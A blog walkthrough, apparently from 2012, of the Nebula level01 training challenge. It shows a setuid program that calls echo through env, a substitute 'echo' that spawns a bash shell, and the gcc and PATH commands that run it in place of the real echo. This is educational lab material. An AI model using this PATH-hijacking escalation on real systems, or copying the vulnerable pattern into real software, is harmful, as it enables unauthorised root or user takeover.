Tuesday, 10 April 2012

exploit-exercises.com walkthrough - Nebula level01

Here's the vulnerable source code:
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
int main(int argc, char **argv, char **envp)
{
 gid_t gid;
 uid_t uid;
 gid = getegid();
 uid = geteuid();

 setresgid(gid, gid, gid);
 setresuid(uid, uid, uid);

 system("/usr/bin/env echo and now what?");
}
The binary is located at /home/flag01/flag01. When executed, it simply echoes the "and now what?" message. The path to env is absolute, but env finds echo by searching PATH, which the caller controls, so the echo that actually gets run can be substituted. We'll achieve this by creating a simple C program in /home/level01:
#include <stdlib.h>
#include <stdio.h>
/* Stand-in for echo: starts a shell instead of printing its arguments. */
int main(void)
{
       system("/bin/bash");
       return 0;
}

Now we need to compile it:
level01@nebula:~$ gcc -o echo 1.c
In the next step we prepend /home/level01 to the PATH variable, so that our echo is found first:
level01@nebula:~$ PATH=/home/level01:$PATH
All we need to do now is run flag01.
level01 completed.

That's it!